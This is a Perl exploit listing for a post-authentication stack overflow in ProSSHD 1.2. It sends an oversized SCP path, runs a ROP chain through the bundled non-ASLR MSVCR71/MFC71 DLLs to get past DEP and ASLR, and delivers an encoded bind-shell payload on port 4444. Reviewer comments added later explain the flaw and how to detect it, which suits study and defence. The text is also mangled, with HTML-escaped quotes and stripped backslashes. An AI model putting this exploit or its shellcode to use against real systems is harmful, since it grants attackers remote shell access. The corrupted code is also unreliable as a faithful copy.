
ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)

Posted on 03 May 2010

============================================================
ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)
============================================================

# Exploit Title: ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)
# Date: 03.05.2010
# Author: Alexey Sintsov
# Software Link: http://www.exploit-db.com/application/11618
# Version: 1.2
# Tested on: Windows XP SP3 / Windows 7
# CVE :
# Code :
################################################################################
# Original exploit by S2 Crew [Hungary]
# * * *
# ROP for DEP and ASLR bypass by Alexey Sintsov from DSecRG [www.dsecrg.com]
# * * *
# Tested on: ProSSHD v1.2 on Windows XP and Windows 7 with DEP for all
#
# Special for XAKEP magazine [www.xakep.ru]
#
#
# CVE: -

#!/usr/bin/perl
use Net::SSH2;

# NOTE(review): what this listing demonstrates, read from a defensive standpoint.
# The script authenticates over SSH and then issues a single SCP "get" whose
# remote path is an oversized buffer ($fuzz). 491 bytes of filler precede the
# saved return address (see "buffer before RET addr rewriting" below), so the
# defect is a stack buffer overflow in the server's handling of that path; the
# exact parsing routine is not shown here -- confirm against the vendor fix.
# Valid credentials are required (post-auth), so account hygiene and key-only
# authentication on the SSH service directly reduce exposure.
# The DEP/ASLR bypass works only because the product bundles its own copies of
# MSVCR71.DLL and MFC71.DLL built without ASLR support; every gadget address
# below comes from those two modules. Takeaway: audit third-party runtime DLLs
# shipped alongside a service for /DYNAMICBASE -- one non-randomised module in
# the process is enough to defeat system ASLR.
# Detection hints: an SCP request carrying a path of several hundred bytes
# right after a successful login, or a crash of the ProSSHD service.
# This copy is not byte-accurate: the hosting page altered escape sequences,
# quote characters and line breaks, so treat the listing as documentation of
# the technique rather than as a runnable script.

$username = '';
$password = '';
$host = '192.168.126.129'; #Remote host (lab address in the original listing)
#$host = '192.168.13.6';
$port = 22;

# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# LPORT=4444, RHOST=, EXITFUNC=process, InitialAutoRunScript=,
# AutoRunScript=
# NOTE(review): encoded payload as published; it is appended after the ROP
# chain and only runs once VirtualProtect has made the stack executable.
$shell = &quot;xbaxdax29x13xdaxd9xe9xd9x74x24xf4x58x31xc9&quot; .
&quot;xb1x56x31x50x13x83xc0x04x03x50xd5xcbxe6x26&quot; .
&quot;x01x82x09xd7xd1xf5x80x32xe0x27xf6x37x50xf8&quot; .
&quot;x7cx15x58x73xd0x8exebxf1xfdxa1x5cxbfxdbx8c&quot; .
&quot;x5dx71xe4x43x9dx13x98x99xf1xf3xa1x51x04xf5&quot; .
&quot;xe6x8cxe6xa7xbfxdbx54x58xcbx9ex64x59x1bx95&quot; .
&quot;xd4x21x1ex6axa0x9bx21xbbx18x97x6ax23x13xff&quot; .
&quot;x4ax52xf0xe3xb7x1dx7dxd7x4cx9cx57x29xacxae&quot; .
&quot;x97xe6x93x1ex1axf6xd4x99xc4x8dx2exdax79x96&quot; .
&quot;xf4xa0xa5x13xe9x03x2ex83xc9xb2xe3x52x99xb9&quot; .
&quot;x48x10xc5xddx4fxf5x7dxd9xc4xf8x51x6bx9exde&quot; .
&quot;x75x37x45x7ex2fx9dx28x7fx2fx79x95x25x3bx68&quot; .
&quot;xc2x5cx66xe5x27x53x99xf5x2fxe4xeaxc7xf0x5e&quot; .
&quot;x65x64x79x79x72x8bx50x3dxecx72x5ax3ex24xb1&quot; .
&quot;x0ex6ex5ex10x2exe5x9ex9dxfbxaaxcex31x53x0b&quot; .
&quot;xbfxf1x03xe3xd5xfdx7cx13xd6xd7x0bx13x18x03&quot; .
&quot;x58xf4x59xb3x4fx58xd7x55x05x70xb1xcexb1xb2&quot; .
&quot;xe6xc6x26xccxccx7axffx5ax58x95xc7x65x59xb3&quot; .
&quot;x64xc9xf1x54xfex01xc6x45x01x0cx6ex0fx3axc7&quot; .
&quot;xe4x61x89x79xf8xabx79x19x6bx30x79x54x90xef&quot; .
&quot;x2ex31x66xe6xbaxafxd1x50xd8x2dx87x9bx58xea&quot; .
&quot;x74x25x61x7fxc0x01x71xb9xc9x0dx25x15x9cxdb&quot; .
&quot;x93xd3x76xaax4dx8ax25x64x19x4bx06xb7x5fx54&quot; .
&quot;x43x41xbfxe5x3ax14xc0xcaxaax90xb9x36x4bx5e&quot; .
&quot;x10xf3x7bx15x38x52x14xf0xa9xe6x79x03x04x24&quot; .
&quot;x84x80xacxd5x73x98xc5xd0x38x1ex36xa9x51xcb&quot; .
&quot;x38x1ex51xde&quot;;

# $fuzz is the single oversized SCP path: filler up to the saved return
# address, then the ROP chain, then the payload.
$fuzz = &quot;x41&quot;x491 . # buffer before RET addr rewriting

############################### ROP
# All ROP instructions from non ASLR modules (coming with ProSHHD distrib): MSVCR71.DLL and MFC71.DLL
# For DEP bypass used VirtualProtect call from non ASLR DLL - 0x7C3528DD (MSVCR71.DLL)
# this makes the stack executable:
# NOTE(review): the chain first builds the four VirtualProtect arguments in
# place on the stack (using the DEC/INC EAX gadgets as a crude pointer walk),
# then returns into the call. The "^^^" markers in the original pointed at
# the gadget consuming each filler dword; their column alignment was lost
# in this copy.

#### RET rewrite###
&quot;x9Fx07x37x7C&quot;. # MOV EAX, EDI / POP EDI / POP ESI / RETN ; EAX points on our stack data with some offset
&quot;x11x11x11x11&quot;. # JUNK---------------^^^ ^^^
&quot;x22x22x22x22&quot;. # JUNK-------------------------^^^
&quot;x27x34x34x7C&quot;. # MOV ECX, EAX / MOV EAX, ESI / POP ESI / RETN 10
&quot;x33x33x33x33&quot;. # JUNK------------------------------^^^
&quot;xC1x4Cx34x7C&quot;. # POP EAX / RETN # ^^^
&quot;x33x33x33x33&quot;. # ^^^
&quot;x33x33x33x33&quot;. # ^^^
&quot;x33x33x33x33&quot;. # ^^^
&quot;x33x33x33x33&quot;. # ^^^
# ^^^
&quot;xC0xFFxFFxFF&quot;. # ----^^^ Param for next instruction...
&quot;x05x1ex35x7C&quot;. # NEG EAX / RETN ; EAX will be 0x40 (param for VirtualProtect)
&quot;xc8x03x35x7C&quot;. # MOV DS:[ECX], EAX / RETN ; save 0x40 (3 param)
&quot;x40xa0x35x7C&quot;. # MOV EAX, ECX / RETN ; restore pointer in EAX
&quot;xA1x1Dx34x7C&quot;. # DEC EAX / RETN ; Change position
&quot;xA1x1Dx34x7C&quot;. # DEC EAX / RETN
&quot;xA1x1Dx34x7C&quot;. # DEC EAX / RETN
&quot;xA1x1Dx34x7C&quot;. # DEC EAX / RETN
&quot;xA1x1Dx34x7C&quot;. # DEC EAX / RETN
&quot;xA1x1Dx34x7C&quot;. # DEC EAX / RETN
&quot;xA1x1Dx34x7C&quot;. # DEC EAX / RETN
&quot;xA1x1Dx34x7C&quot;. # DEC EAX / RETN
&quot;xA1x1Dx34x7C&quot;. # DEC EAX / RETN
&quot;xA1x1Dx34x7C&quot;. # DEC EAX / RETN
&quot;xA1x1Dx34x7C&quot;. # DEC EAX / RETN
&quot;xA1x1Dx34x7C&quot;. # DEC EAX / RETN ; EAX=ECX-0x0c
&quot;x08x94x16x7C&quot;. # MOV DS:[EAX+0x4], EAX / RETN ;save address for VirtualProtect (1 param)
&quot;xB9x1Fx34x7C&quot;. # INC EAX / RETN ; oh ... and move pointer back
&quot;xB9x1Fx34x7C&quot;. # INC EAX / RETN
&quot;xB9x1Fx34x7C&quot;. # INC EAX / RETN
&quot;xB9x1Fx34x7C&quot;. # INC EAX / RETN ; EAX=ECX=0x8
&quot;xB2x01x15x7C&quot;. # MOV [EAX+0x4], 1 ; size for VirtualProtect (2 param)
&quot;xA1x1Dx34x7C&quot;. # DEC EAX / RETN ; Change position for output from VirtualProtect
&quot;xA1x1Dx34x7C&quot;. # DEC EAX / RETN
&quot;xA1x1Dx34x7C&quot;. # DEC EAX / RETN
&quot;xA1x1Dx34x7C&quot;. # DEC EAX / RETN
&quot;xA1x1Dx34x7C&quot;. # DEC EAX / RETN
&quot;xA1x1Dx34x7C&quot;. # DEC EAX / RETN
&quot;xA1x1Dx34x7C&quot;. # DEC EAX / RETN
&quot;xA1x1Dx34x7C&quot;. # DEC EAX / RETN
&quot;xA1x1Dx34x7C&quot;. # DEC EAX / RETN
&quot;xA1x1Dx34x7C&quot;. # DEC EAX / RETN
&quot;xA1x1Dx34x7C&quot;. # DEC EAX / RETN
&quot;xA1x1Dx34x7C&quot;. # DEC EAX / RETN
&quot;x27x34x34x7C&quot;. # MOV ECX, EAX / MOV EAX, ESI / POP ESI / RETN 10
&quot;x33x33x33x33&quot;. # JUNK------------------------------^^^
&quot;x40xa0x35x7C&quot;. # MOV EAX, ECX / RETN ; restore pointer in EAX
# NOTE(review): in this copy the next five lines read as commented-out; the
# original line breaks are not recoverable from the page, so whether they were
# live fillers for the RETN 10 above is uncertain -- verify against the
# upstream listing.
# &quot;x33x33x33x33&quot;.
# &quot;x33x33x33x33&quot;.
# &quot;x33x33x33x33&quot;.
# &quot;x33x33x33x33&quot;.
# &quot;xB9x1Fx34x7C&quot;. # INC EAX / RETN ; and again...
&quot;xB9x1Fx34x7C&quot;. # INC EAX / RETN
&quot;xB9x1Fx34x7C&quot;. # INC EAX / RETN
&quot;xB9x1Fx34x7C&quot;. # INC EAX / RETN
&quot;xE5x6Bx36x7C&quot;. # MOV DS:[EAX+0x14], ECX ; save output addr for VirtualProtect (4 param)
&quot;xBAx1Fx34x7C&quot;x204 . # RETN fill.....
&quot;xDDx28x35x7C&quot;. # CALL VirtualProtect / LEA ESP, [EBP-58] / POP EDI / ESI / EBX / RETN ;Call VirtualProtect
&quot;AAAABBBBCCCCDDDD&quot;. # Here is place for params (VirtualProtect)

####################### return into stack after VirtualProtect
&quot;x1AxF2x35x7C&quot;. # ADD ESP, 0xC / RETN ; take next ret
&quot;XXXYYYZZZ123&quot;. # trash
&quot;x30x5Cx34x7C&quot;. # 0x7c345c2e: ANDPS XMM0, XMM3 -- (+0x2 to address and....) --&gt; PUSH ESP / RETN ; EIP=ESP
&quot;x90&quot;x14 . # NOPs here is the beginning of shellcode
$shell; # shellcode 8)

# Connect and authenticate; both failures are fatal. The overflow itself is
# only reachable after a successful password login.
$ssh2 = Net::SSH2-&gt;new();
$ssh2-&gt;connect($host, $port) || die &quot; Error: Connection Refused! &quot;;
$ssh2-&gt;auth_password($username, $password) || die &quot; Error: Username/Password Denied! &quot;;
#sleep(10);
# The oversized buffer is handed to scp_get as the remote path; presumably the
# server copies that path into a fixed-size stack buffer -- the vulnerable
# routine is not visible here.
$scpget = $ssh2-&gt;scp_get($fuzz);
$ssh2-&gt;disconnect();

# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-03]

 
